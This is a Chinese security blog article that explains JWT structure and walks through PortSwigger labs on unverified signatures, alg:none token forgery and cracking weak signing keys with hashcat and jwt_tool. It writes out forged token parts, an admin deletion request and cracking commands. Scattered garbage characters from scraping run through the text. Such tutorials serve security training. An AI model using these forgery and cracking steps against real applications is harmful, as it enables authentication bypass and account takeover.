干货 | JWT渗透姿势一篇通3 Q* D& j) O( q# I* k! V
; W0 q% _ A$ x: G+ g9 c$ Z5 K- N) } 渗透安全团队 2023-10-20 00:00 湖北
( Z+ G' O- A5 i! y& J! f% G! ?9 E; J 文章前言
1 s, L5 X$ K! X! C1 e
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
& ~. D2 e5 T6 J- {( n5 F3 O 企业内部产品应用使用JWT作为用户的身份认证方式,在对应用评估时发现了新的关于JWT的会话安全带来的安全问题,后期再整理时又加入了之前遗留的部分JWT安全问题,至此汇总成一篇完整的JWT文章
简单介绍
; l T" [: f" l2 A2 ]" @ JWT(JSON Web Token)是一种用于身份认证和授权的开放标准,它通过在网络应用间传递被加密的JSON数据来安全地传输信息使得身份验证和授权变得更加简单和安全,JWT对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键而且还被视为隐藏了通往以下特权的途径,例如:特权升级、信息泄露、SQLi、XSS、SSRF、RCE、LFI等# Q# {. E* J! i! S: K
基础概念/ m- b. W, h2 Z& I$ _. @
% u: L3 H' d8 J" B 基本结构' {( c1 U5 r# p5 V$ @! B( B
5 A" Y" R8 u7 h& H; z9 O" w8 X- B: h4 T% u7 c: i) M( r JWT(JSON Web Token)的结构由三部分组成,分别是Header、Payload和Signature,下面是每一部分的详细介绍和示例:
' n9 Z- E9 I: [( _ Header
Header包含了JWT使用的算法和类型等元数据信息,通常使用JSON对象表示并使用Base64编码,Header中包含两个字段:alg和typ
/ W" U7 q$ ]& E/ W
alg(algorithm):指定了使用的加密算法,常见的有HMAC、RSA和ECDSA等算法
typ(type):指定了JWT的类型,通常为JWT( V: t8 {* F0 Z. ?2 K
下面是一个示例Header:! z. x0 q; j0 S$ w$ g
7 F. U6 |+ Q) \. b, _7 a( Y: W l* {) v* }$ j: G# [
{
"alg": "HS256",
6 l8 P0 [# L W; i1 D
"typ": "JWT"
4 z; u7 O( }9 H8 V* x! Z
}4 y( Q3 x2 r3 X1 f% v. b
其中alg指定了使用HMAC-SHA256算法进行签名,typ指定了JWT的类型为JWT/ W- @: G w* H& I: }+ c( c
' i6 n* ^) t% B$ K# f5 y d% zPayload
6 i3 M% d, C7 S+ r* t2 d! A: h$ ], O T' q. J Payload包含了JWT的主要信息,通常使用JSON对象表示并使用Base64编码,Payload中包含三个类型的字段:注册声明、公共声明和私有声明
' N5 R* g; C" R# I, d& Z; W下面是一个示例Payload:: I! |7 e& V; J+ I6 I2 n
{
# T n' t# M* W6 P! N
"sub": "1234567890",
: O- P' w) @$ j0 @$ W) ^' I
"name": "John Doe",
"iat": 1516239022
! X# f! T: K M2 F
}
5 E3 @- w$ @2 b1 V) P! I2 u 其中sub表示主题,name表示名称,iat表示JWT的签发时间
Signature
Signature是使用指定算法对Header和Payload进行签名生成的,用于验证JWT的完整性和真实性,Signature的生成方式通常是将Header和Payload连接起来然后使用指定算法对其进行签名,最终将签名结果与Header和Payload一起组成JWT,Signature的生成和验证需要使用相同的密钥,下面是一个示例Signature+ L6 k, u+ l" ~; y3 l' v! s6 c
2 C4 e L- w" O- v2 A3 p* Q( {% e& r+ @- I9 k HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)
$ v; H3 a" x0 G. |. E6 p& H" C 其中HMACSHA256是使用HMAC SHA256算法进行签名,header和payload是经过Base64编码的Header和Payload,secret是用于签名和验证的密钥,最终将Header、Payload和Signature连接起来用句点(.)分隔就形成了一个完整的JWT,下面是一个示例JWT,其中第一部分是Header,第二部分是Payload,第三部分是Signature,注意JWT 中的每一部分都是经过Base64编码的,但并不是加密的,因此JWT中的信息是可以被解密的
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
6 h' i% o$ Q) t0 M
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
# @, r3 c! u2 R0 T; i& ~- _
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
7 |+ w6 s, I$ M$ m! u* D; P% s 在线平台9 V# y' z* ~) ?0 J& v% z, d
- x1 o( s) X, ?& b7 G
下面是一个JWT在线构造和解构的平台:
https://jwt.io/
工作原理" w7 q: i6 o) [* p
JWT工作原理" S D! z3 c: R, j; e+ ^3 P6 |$ O
5 c' X, t4 w) E2 V! A6 U% X J& G8 ~JWT的工作流程如下:6 W+ \1 E9 |3 H9 J6 ~7 S" l S
JKU工作原理: B) C+ r0 b s/ n+ B. o' Y$ Q0 T* Z
, m) i! ?# P1 Y0 c$ n Step 1:用户携带JWS(带有签名的JWT)访问应用% p' [- z& }9 Z5 F) f- {
d* w" q6 K! J; U
+ R% _. {5 V D2 s/ Y4 D$ v( _4 |2 A
Step 2:应用程序解码JWS得到JKU字段
! b$ @+ f3 j8 N6 P; Y3 e# u$ ` Step 3:应用根据JKU访问返回JWK的服务器( z, M; |$ ]- r0 \/ S. x
7 w& P+ G# j n* v% D7 ?
6 ]5 g* E! ~3 }
Step 4:应用程序得到JWK
. d2 h% A8 K% o4 O6 B4 a
9 x# y6 }! S( W' p
h4 C; P ?- ^; j" j- q7 ^2 d4 O Step 5:使用JWK验证用户JWS
5 |7 u# d3 y2 N% k
Step 6:验证通过则正常响应9 ^9 G# C8 d Y8 O: O
4 j0 E; U, E& I7 F! j9 t
漏洞攻防
! S3 m2 @" X$ M 签名未校验
验证过程" @7 M/ N7 F# }4 |2 Z4 u1 K
; H/ t' A+ `: lJWT(JSON Web Token)的签名验证过程主要包括以下几个步骤:
8 I1 _1 R! z, U- _( k& y/ a% }& v 下面是一个使用JAVA进行JWT签名验证的示例代码:
- |1 K# P A8 W+ _9 `6 Q# m
import io.jsonwebtoken.Claims;
import io.jsonwebtoken.Jwts;
* t. @$ H9 n' `) c
import io.jsonwebtoken.SignatureAlgorithm;
$ p' z$ { i5 u
import java.util.Date;
4 k- O d u6 @$ D5 z$ X0 z
public class JWTExample {
8 g) ~3 L& Q& ^
$ J9 J: E! L4 G V5 b" |1 n
private static final String SECRET_KEY = "my_secret_key";
public static void main(String[] args) {
& d' P8 F# X s. W0 c, ~% y" \
// 构建 JWT
+ j# d( I& A) ]! T
String jwtToken = Jwts.builder()
.setSubject("1234567890")
.claim("name", "John Doe")
.setIssuedAt(new Date())
.setExpiration(new Date(System.currentTimeMillis() + 3600000)) // 1 hour
.signWith(SignatureAlgorithm.HS256, SECRET_KEY)
.compact();
9 s; R S! `: k, ^7 R* U
// 验证 JWT
! v" O% E6 X* _# ?+ b3 T
try {
// 分离 Header, Payload 和 Signature
String[] jwtParts = jwtToken.split("\\.");
String header = jwtParts[0];
String payload = jwtParts[1];
+ ]" F9 F+ M8 @
String signature = jwtParts[2];
6 [. |: x% G1 V( p4 D0 P8 x
// 验证签名
2 C" h, K3 A8 Z2 M/ p7 U
String expectedSignature = Jwts.parser()
.setSigningKey(SECRET_KEY)
7 n- }' G) A/ J+ Z
.parseClaimsJws(jwtToken)
" I3 y7 u' w. _' J: w( f4 I
.getSignature();
if (!signature.equals(expectedSignature)) {
throw new RuntimeException("Invalid JWT signature");
}
3 I& m4 k$ I' d
4 m& y; W- e0 f2 d4 {
// 验证 Payload 中的信息
7 B/ ]" N- t0 u' _, D
Claims claims = Jwts.parser()
.setSigningKey(SECRET_KEY)
! G) ~# f- V4 m4 V* q9 C
.parseClaimsJws(jwtToken)
5 ]0 m, u! |7 W5 g
.getBody();
System.out.println("Valid JWT");
+ c. E" I' P; j& B5 c4 ^
} catch (Exception e) {
4 |6 [/ D' {6 k, x9 g6 c* a6 R3 v6 z
System.out.println("Invalid JWT: " + e.getMessage());
; |& j# _6 C R t$ f$ ?
}
}
0 ^& ]! D$ h: a( W8 m) k( \
}* i: C7 ]. S1 v9 v& u
( z1 {! d* \: N# H# P 在上面的示例代码中使用jwt库进行JWT的签名和验证,首先构建了一个JWT,然后将其分离为Header、Payload和Signature三部分,使用parseClaimsJws函数对JWT进行解析和验证,从而获取其中的Payload中的信息并进行验证,最后如果解析和验证成功,则说明JWT是有效的,否则说明JWT是无效的,在实际应用中应该将SECRET_KEY替换为应用程序的密钥/ {# _5 `* f' B1 C4 x, [1 K @
* G `# m. t! t% F" N' U Z6 i0 g0 R2 e! X! t 漏洞案例0 N# k5 R0 }. J# E$ P" b0 R
" a) l; S% z* l% t( J7 y7 G
JWT库会通常提供一种验证令牌的方法和一种解码令牌的方法,比如:Node.js库jsonwebtoken有verify()和decode(),有时开发人员会混淆这两种方法,只将传入的令牌传递给decode()方法,这意味着应用程序根本不验证签名,而我们下面的使用则是一个基于JWT的机制来处理会话,由于实现缺陷服务器不会验证它收到的任何JWT的签名,如果要解答实验问题,您需要修改会话令牌以访问位于/admin的管理面板然后删除用户carlos,您可以使用以下凭据登录自己的帐户:wiener:peter
8 h- B- J" _0 `' }2 r1 v9 [
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature& V# O4 M: ? N
: b( h8 E# L/ Z+ ]1 o
) P! E6 Z U; F: _6 @& k' {
演示步骤:
Step 1:点击上方的"Access the Lab"访问靶场并登录账户2 r) o3 O+ Y ]# d S
$ P! ?/ x" g+ f6 W Step 2:进入到Web界面并登录靶场账户
! Z, Q5 g7 f5 a wiener:peter* U$ w$ z" D3 m$ R- q! k( v# g
9 C$ x( ^% E! B/ C' R5 p, I, @; K0 c$ \1 ^0 M
% a* E8 P, d$ k: Z7 r: f8 q% E2 y
& o; _4 _8 {' }; Q% Y- R2 q$ s6 A
( }- O, ?, R3 @' B 登录之后会看到如下一个更新邮箱的界面
% \3 o+ \- L1 I0 v2 D' r+ q) d Step 3:此时在我们的burpsuite中我们可以看到如下的会话信息2 a% w# w( E- m$ a4 m, v8 T
% |: N. D* K0 v8 `
此时查询当前用户可以看到会显示当前用户为wiener:0 W" ~+ ?# D r8 K4 Z
% I' x! ^$ G1 X- F& A! z% b2 V
5 V( q' [# h V 截取上面中间一部分base64编码的部分更改上面的sub为"administrator"
' B1 e2 C/ a" T3 R2 B$ M eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MDA4M30, P4 W" D9 J3 R
/ N' ]6 L7 l- n
1 t3 T# y# e+ s: e, C
构造一个sub为"administrator"的载荷并将其进行base64编码处理:% J. o/ E2 ~) k! \# r
2 h. @0 B. L" m/ s( ^5 U eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTAwODN9
) \. L2 v8 c. g% o" d
! a# J, e& b0 G/ N" f+ C 替换之后重新发送请求:
& C& Q) D. H1 I
, C! h- k5 v. K" I; N2 W8 b
9 A D) K; B% S; b 按照题目要求访问/admin路径,发现两个删除用户的调用接口:0 R, A3 K6 i/ L' q; N2 m
/ [& O; K! H% S; {$ E
请求敏感链接——删除用户carlos
GET /admin/delete?username=carlos HTTP/1.1" m' ^- ~& i; X
8 v1 M5 G: x2 U4 m; n0 |& y
完成靶场的解答:2 X& F7 e5 V+ I7 I
3 ]2 v) f, V/ v0 M: c2 `. ^7 V
8 |1 {/ L7 s' e3 v6 y0 i
签名用None2 E) |* k) b% o
场景介绍0 C2 h. @3 o% B8 \% v7 C
1 V4 b) O5 n0 \$ g4 R& \/ I" ]+ R7 Y$ r4 J8 I. @ 在JWT的Header中alg的值用于告诉服务器使用哪种算法对令牌进行签名,从而告诉服务器在验证签名时需要使用哪种算法,目前可以选择HS256,即HMAC和SHA256,JWT同时也支持将算法设定为"None",如果"alg"字段设为"None",则标识不签名,这样一来任何token都是有效的,设定该功能的最初目的是为了方便调试,但是若不在生产环境中关闭该功能,攻击者可以通过将alg字段设置为"None"来伪造他们想要的任何token,接着便可以使用伪造的token冒充任意用户登陆网站% i5 R: ?/ d# \7 F2 H; F) W6 y+ |$ S7 Q
) ~* G7 A/ L. P# X: {2 L; D
{
9 J/ J" K. i4 G- K3 x V1 N
"alg": "none",
"typ": "JWT"
}
" f- o6 C' ^( `5 y 漏洞案例
9 a* C. c; l0 X" X% |3 D8 T4 Q# x" ?" M' E8 r8 [ 实验靶场:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification& x* a' l6 X3 r: v- ?2 {
8 X& s2 u% A. j5 M0 w
实验流程:
Step 1:点击上方的"Access the lab"访问靶场环境
https://0a9c00a8030ba77784d7b92d ... curity-academy.net/
! O# f! t [/ @+ C+ `4 c2 d5 p, c
7 }' H( E4 b- \) _( N- F1 `- d Step 2:使用账户密码进行登录2 H! u2 n7 y3 D" [, D. W1 d- f& x
wiener:peter
# ^+ @7 o9 u; S8 R( O8 F ' _8 R2 O4 k6 A' h7 P5 x Y$ i/ a
Step 3:登录之后可以看到如下界面# I8 \6 m+ G: W% m$ N' E
' F4 L% a. | r& x) C5 h4 G4 k4 T# S! e; V6 ]0 E9 W) Y2 C
* E, ~9 ^/ d' ^9 {' o3 X+ r1 U; _' P/ @4 P3 U Step 4:捕获到的数据报信息如下所示
% J* F d' O( D, o
截取JWT的第二部分对其进行base64解码:0 l& `4 B0 P. Q! }4 {# ^
9 J y7 {& j; ?: }$ e8 aeyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MzQ5M30% n. U1 N0 M3 W! A% i2 k
, L% f& ?8 p; Y0 W. w - f ?/ R6 M2 c& B
z& _, N) E$ c' Z6 ` 将上述的sub字段值更改为"administrator"* V( G# u+ B3 P/ ~6 {9 M h
U8 D8 o' ?6 M& X0 Z1 C# S, @: [/ Y9 c. K' O/ G7 h eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTM0OTN9! v* ^# \, I# N! e
" z, w( l4 ?5 Q3 j: T' n7 I6 F F0 f" |( W5 @ @
: O+ d' l* i6 \2 p Step 4:在使用wiener用户的凭据访问/admin是会提示401 Unauthorized
2 o7 }9 C/ s6 |; M- E9 R/ [) P: _$ M t 9 b. s8 e# M/ c% d( g
Z9 s( G- K Q, h& p# v8 f9 Q6 Z, d- i9 a* o& y Step 5:将第一步分的alg参数改为none( u& O2 b5 X% {& y8 Y6 ^, ^
9 \; L' K! m; B `4 t, L& d. XeyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJSUzI1NiJ9
1 k( B5 O5 G$ O! { N9 d7 E) D0 e' t' `+ a" H8 Y e6 P% j" C. ? 5 m( A2 t1 L5 t- y# H# T
h ]% C8 X) k& a& [/ z' V 更改之后的header部分:& K* _( K- p! h1 \& ~& y- j
eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJub25lIn0=
0 }; k4 t8 m4 c3 }2 f+ ^ h% L8 { $ ~) W+ ?& d- f
7 G" d0 c. ?$ d* r( |, r6 F 替换JWT Token中的第二部分为之前我们构造的信息,同时移除签名部分,再次请求数据获取到敏感数据链接
+ j* x, M( E2 Y 7 P, t3 i7 H: e* y3 Q
! t5 `0 Q) D( Q# i% a2 h8 g' S/ g调用敏感链接移除用户信息,完成解题操作:
) }; h" ~& W0 y" y& N; D2 x- e' H. x) N
% U+ a) g7 H* s2 W7 n) ~; G5 e5 y: ^/ j8 j " i- z2 u# F# q) N" o
* T$ f1 U1 M. f, ~$ e9 |2 { P# g5 E 密钥暴力猜解
密钥介绍9 Q" [8 n+ r% v) h5 }
7 o5 X% R' t2 g1 V- N* @; }. \; Y1 E3 E$ J 在JT中密钥用于生成和验证签名,因此密钥的安全性对JWT的安全性至关重要,一般来说JWT有以下两种类型的密钥:
8 e, G# O0 C3 O9 ^# U' j; U 下面是一个使用JWT和对称密钥的JAVA示例代码:
& T, \% t" A7 D' h d/ G5 `$ w
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import java.util.Date;
public class JWTExample {
$ |. _; h" j: R& C. b" s
private static final String SECRET_KEY = "mysecretkey"; // 设置密钥
( Y4 t: N n- [2 x' E& s
# V$ r: [- t! G# P: u
public static void main(String[] args) {
8 u# ]6 ^" {. K" j; @
String token = createJWT("123456"); // 生成JWT
System.out.println(token);
String result = parseJWT(token); // 验证JWT
System.out.println(result);
2 s* k% \: J5 }9 H3 P
}
) C, `( m/ ~' C7 R# C8 U) ?
& L2 @$ W- x, K
public static String createJWT(String id) {
// 设置JWT过期时间为1小时
, s4 V5 L7 f9 {) D7 s+ h- r& @
long nowMillis = System.currentTimeMillis();
+ b' V+ ], W. Y! O* s- o/ v
Date now = new Date(nowMillis);
long expMillis = nowMillis + 3600000; // 1小时
Date exp = new Date(expMillis);
4 I0 q# h6 T. {9 j: s# R
$ A3 Z4 g) l$ o6 L! I% X# n
// 生成JWT
String token = Jwts.builder()
" q$ D3 G+ } c+ x) L# ~4 u9 [
.setId(id)
) E0 H& H8 x" m8 k
.setIssuer("issuer")
.setSubject("subject")
1 n7 l1 }/ h0 p4 k- ?
.setIssuedAt(now)
.setExpiration(exp)
.signWith(SignatureAlgorithm.HS256, SECRET_KEY)
.compact();
# p+ I, ` H7 K4 N l# |( I
return token;
0 X2 f, k* a/ b
}
, p+ i* _4 w( y& x8 k& V
public static String parseJWT(String token) {
2 C) x/ S5 u! }* t4 d
// 验证JWT是否合法
( i6 d1 o+ H. S- J
String result = "";
try {
% @1 V6 ~. w9 ?1 Q! R5 q
result = Jwts.parser()
.setSigningKey(SECRET_KEY)
.parseClaimsJws(token)
.getBody()
.getId();
} catch (Exception e) {
e.printStackTrace();
& n; N4 s# z& i2 m- f9 ~+ K3 ]
}
return result;
}
}
下面是一个使用JWT和非对称密钥的Java示例代码,代码中使用了RSA算法生成非对称密钥对:, |- V$ {$ v0 {9 u
- q; u* w9 q8 g! _ I# y$ p
import io.jsonwebtoken.Claims;
; W+ W* u4 F6 \4 R
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
1 W8 Y7 p6 n8 ?9 _3 L& V- {
import io.jsonwebtoken.security.Keys;
' `9 O" j$ \5 f9 i9 @
import java.security.KeyPair;
import java.security.KeyPairGenerator;
) J& _3 f% r8 ~
import java.security.NoSuchAlgorithmException;
# C h& A4 W g; m( i& ~+ L
import java.security.PrivateKey;
$ l# \$ Z& O4 O; }# M* w, G1 |
import java.security.PublicKey;
import java.util.Date;
/ z& p+ v6 W* B
; B- _( r. m& S+ x
public class JWTExample {
0 k% W2 h8 N, \: a
private static final String ISSUER = "example.com";
! z' T" [& r- g/ j
private static final String SUBJECT = "user@example.com";
/ j7 y" e5 L& U6 U4 h
public static void main(String[] args) throws Exception {
. T) v% O0 ~: K4 u' t& @. ^& ~
KeyPair keyPair = generateKeyPair();
. Z3 ?& y7 @. y( i! Q
7 j0 I& U9 k( \" Q
String token = createJWT(ISSUER, SUBJECT, keyPair.getPrivate());
System.out.println(token);
: i( w m2 N: L0 y2 |2 ?0 ~- |( q
Claims claims = parseJWT(token, keyPair.getPublic());
System.out.println(claims.getIssuer());
1 V8 }1 d& z! G2 Q" _/ M3 ~
System.out.println(claims.getSubject());
}
- ]( ^* S" @, \) A8 B: ~9 v
9 W; U) p- N9 k( g
public static String createJWT(String issuer, String subject, PrivateKey privateKey) {
; L5 I" |8 S9 l; |/ m' L
Date now = new Date();
3 T% ~( z2 J0 C4 b- G" u( G1 u
Date expiration = new Date(now.getTime() + 3600 * 1000); // 1 hour
% v5 c! x X7 D3 t
return Jwts.builder()
.setIssuer(issuer)
.setSubject(subject)
% _6 P; L$ [# Z# j( ^" t% o
.setIssuedAt(now)
.setExpiration(expiration)
3 W* v$ V" ], D
.signWith(privateKey, SignatureAlgorithm.RS256)
.compact();
}
public static Claims parseJWT(String token, PublicKey publicKey) {
return Jwts.parserBuilder()
.setSigningKey(publicKey)
.build()
.parseClaimsJws(token)
R, _: J! h9 B5 Z
.getBody();
* t; D5 }: X7 T: H
}
/ S5 {& \: ?' `* N1 X4 c
, K% V8 a4 s- e( g" _" B( l! b
public static KeyPair generateKeyPair() throws NoSuchAlgorithmException {
" s( T& C5 Y- @4 L2 |
KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
generator.initialize(2048);
return generator.generateKeyPair();
& h V4 f8 F: e$ h" u+ \
}
$ @- W0 U8 k0 D: k" g
}# N8 z- a, s. |0 N2 Y ]& f1 `
在这个示例中我们使用了Java中的KeyPairGenerator类来生成一个2048位的RSA密钥对,然后使用私钥生成JWT,使用公钥验证JWT,在创建JWT时我们设置了JWT的颁发者、主题、签发时间和过期时间并使用signWith()方法和SignatureAlgorithm.RS256算法使用私钥进行签名,在验证JWT时我们使用公钥来解析JWT并获取声明的内容,在实际的研发编码中我们一方面要妥善保管密钥,另一方面需要使用较为复杂难以被猜解的密钥作为密钥首选,例如:随机字母+数字的32位长度组合 [ ` ?7 N- z( Z8 b" ^) |& F
漏洞案例1 _* p9 W# c# C
在实现JWT应用程序时,开发人员有时会犯一些错误,比如:忘记更改默认密码或占位符密码,他们甚至可能复制并粘贴他们在网上找到的代码片段然后忘记更改作为示例提供的硬编码秘密,在这种情况下攻击者使用众所周知的秘密的单词列表来暴力破解服务器的秘密是很容易的,下面是一个公开已知密钥列表:
https://github.com/wallarm/jwt-s ... er/jwt.secrets.list
0 Q0 @* l2 R4 ^, o 9 u) q5 q; m7 w2 |4 L/ j7 G C/ T7 m( L
( d2 B5 A4 _$ u; a- X" f8 _* B' {9 P! e 在这里我们也建议使用hashcat来强力破解密钥,您可以手动安装hashcat,也可以在Kali Linux上使用预先安装好的hashcat,您只需要一个来自目标服务器的有效的、签名的JWT和一个众所周知的秘密的单词表然后就可以运行以下命令,将JWT和单词列表作为参数传入:9 [ D# `9 X8 |' f' B& q
5 }& I. }/ }. s2 w& ^" s, Q* U' K# {2 p* q- \, W' @ hashcat -a 0 -m 16500 <jwt> <wordlist>
Hashcat会使用单词列表中的每个密钥对来自JWT的报头和有效载荷进行签名,然后将结果签名与来自服务器的原始签名进行比较,如果有任何签名匹配,hashcat将按照以下格式输出识别出的秘密以及其他各种详细信息,由于hashcat在本地机器上运行不依赖于向服务器发送请求,所以这个过程非常快,即使使用一个巨大的单词表一旦您确定了密钥,您就可以使用它为任何JWT报头和有效载荷生成有效的签名7 M" x! ]* p% h# h E
<jwt>:<identified-secret>) B4 v' ^. w6 b2 h
' l7 v2 l5 \9 m! G+ \$ K/ W& S$ r! j 靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key
* S4 b- M. ^% S4 V7 h$ {; j8 K4 F, {: R
0 M: t$ L ~5 X7 B' D: O, K
实验步骤:
Step 1:点击上述"Access the lab"进入到靶场环境
% L. \5 [% F! n! ?( m0 A/ @0 L
Step 2:使用以下账户进行登录操作
' N+ a& d, w! x: M: Q% [! I9 Jwiener:peter
( ]* @/ V$ O% z
O: J0 q2 d, b8 T Step 3:捕获到如下有效的JWT凭据信息0 N. @! k/ N# Q7 f, {& I6 n. B) @
eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw% V" ^- a* l# X% b: T' Z8 I
0 D5 B- @- x9 }) X; y* | ( G( N3 d0 R/ Z$ ^
5 L7 G1 Y' _3 G- \! M 4 `7 d8 S* I5 L$ Y {% Q. p) @) [
Step 5:使用字典进行暴力猜解操作
方式一:HashCat
项目地址:https://github.com/hashcat/hashcat
/ d- d4 m% j& v2 s0 x+ x! w& q
项目使用:
#命令格式:
2 u1 Y# I- u; N5 K, s! X7 F3 r7 _
hashcat -a 0 -m 16500 <jwt> <wordlist>
) u% I; l `4 x" D. l! P% R
5 ?2 u& r5 \7 G' K( l% `
#执行示例:
hashcat -m 16500 jwt.txt -a 0 secrets.txt --force
方式二:jwt_tool
项目地址:https://github.com/ticarpi/jwt_tool
, @3 s5 K/ }8 V8 x6 Y0 v
项目介绍:此项目主要用于JWT安全脆弱性评估,目前支持如下几种安全评估测试
/ ~% \6 I9 S" x
3 z! q3 \0 @2 S, k, t- _" f9 f& T Step 1:克隆项目到本地
% v7 j9 h9 c. j" L; {7 H https://github.com/ticarpi/jwt_tool
) a$ E# P. ]- `7 T2 j Step 2:安装依赖库
pip3 install pycryptodomex" k+ Z7 G6 J! @* G3 c
/ J2 n: M3 K* F, Y0 J9 [Step 3:运行jwt_tool并查看用法信息 `/ T8 O: e9 R4 n4 f- U4 `# W9 ~
python3 jwt_tool.py -h7 X* y' C$ s2 G6 r1 L
& N0 X8 ^7 X/ k* o u) `" Y: ~ ( C) g& q5 X! z; ~4 F# Y- a# F
, D. s, v1 S. \% E4 ]- |& H6 i
usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np] [-nr] [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM] [-pc PAYLOADCLAIM] [-hv HEADERVALUE]
[-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE] [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]
8 k4 H" ?7 `; T5 O
[jwt]
: a% |! n) Q7 d8 `
" r1 e, [+ e* z' X
positional arguments:
jwt the JWT to tinker with (no need to specify if in header/cookies)
0 C7 R$ l. {2 i- r+ `3 t
options:
-h, --help show this help message and exit
& X4 T) V8 k" F, G6 g: W
-b, --bare return TOKENS ONLY
: F- \2 s3 M! }" A& e$ }' l) I4 K# M) C
-t TARGETURL, --targeturl TARGETURL
1 b6 @/ i+ t) { I! l
URL to send HTTP request to with new JWT
[; m" x1 ]" D2 y# w/ m& x: g( y" L
-rc COOKIES, --cookies COOKIES
request cookies to send with the forged HTTP request
+ x6 D6 a: U H* @- Q! h( Q
-rh HEADERS, --headers HEADERS
request headers to send with the forged HTTP request (can be used multiple times for additional headers)
-pd POSTDATA, --postdata POSTDATA
text string that contains all the data to be sent in a POST request
-cv CANARYVALUE, --canaryvalue CANARYVALUE
4 E# t- G& h6 h7 F
text string that appears in response for valid token (e.g. "Welcome, ticarpi")
-np, --noproxy disable proxy for current request (change in jwtconf.ini if permanent)
( P9 Z8 ?; K) y: ]9 g: {9 ^
-nr, --noredir disable redirects for current request (change in jwtconf.ini if permanent)
-M MODE, --mode MODE Scanning mode:
pb = playbook audit
er = fuzz existing claims to force errors
cc = fuzz common claims
at - All Tests!
-X EXPLOIT, --exploit EXPLOIT
4 x& ^" ?/ S% g. C: v" c& K5 ]
eXploit known vulnerabilities:
a = alg:none
n = null signature
b = blank password accepted in signature
2 y( m7 V) n/ O, W r1 ] u
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk)
i = inject inline JWKS
-ju JWKSURL, --jwksurl JWKSURL
8 {- h4 W8 p# p8 b
URL location where you can host a spoofed JWKS
: q- }; l6 d. F+ g5 a, j
-S SIGN, --sign SIGN sign the resulting token:
hs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)
rs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)
- H+ q. p0 f e% p9 q1 [
es256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)
ps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)
-pr PRIVKEY, --privkey PRIVKEY
5 V- }0 v: f0 @- @4 V$ a( y# \
Private Key for Asymmetric crypto
+ ~3 e- \( |' d% P0 J7 a* Q' m! \
-T, --tamper tamper with the JWT contents
(set signing options with -S or use exploits with -X)
( L4 P$ @, h4 Q
-I, --injectclaims inject new claims and update existing claims with new values
(set signing options with -S or use exploits with -X)
(set target claim with -hc/-pc and injection values/lists with -hv/-pv
6 e6 _7 t3 h9 N- K
-hc HEADERCLAIM, --headerclaim HEADERCLAIM
' D8 s) {. A4 o: u' [
Header claim to tamper with
-pc PAYLOADCLAIM, --payloadclaim PAYLOADCLAIM
* T4 f$ K7 T1 g: B
Payload claim to tamper with
' y' n+ v5 u. K% F
-hv HEADERVALUE, --headervalue HEADERVALUE
Value (or file containing values) to inject into tampered header claim
-pv PAYLOADVALUE, --payloadvalue PAYLOADVALUE
Value (or file containing values) to inject into tampered payload claim
# j- Q1 l& z7 d0 L9 n5 e9 I
-C, --crack crack key for an HMAC-SHA token
(specify -d/-p/-kf)
$ v- k. A' [! k I+ x' _8 l
-d DICT, --dict DICT dictionary file for cracking
+ D) q- Y+ K* M3 b9 V, H
-p PASSWORD, --password PASSWORD
! M9 v5 u, K, u, z
password for cracking
5 |, o4 S( y4 \
-kf KEYFILE, --keyfile KEYFILE
keyfile for cracking (when signed with 'kid' attacks)
-V, --verify verify the RSA signature against a Public Key
$ {/ c7 {! W) z9 U9 w5 \3 ^9 I
(specify -pk/-jw)
2 U$ |; h0 G' n3 O$ ^& O# j
-pk PUBKEY, --pubkey PUBKEY
: R% h) _& C" u9 S/ H
Public Key for Asymmetric crypto
-jw JWKSFILE, --jwksfile JWKSFILE
5 P! S3 h- X0 K$ X& f
JSON Web Key Store for Asymmetric crypto
-Q QUERY, --query QUERY
0 }& G: n' U& O; N( F
Query a token ID against the logfile to see the details of that request
2 U! _: w( k& |& `& ^6 h1 t
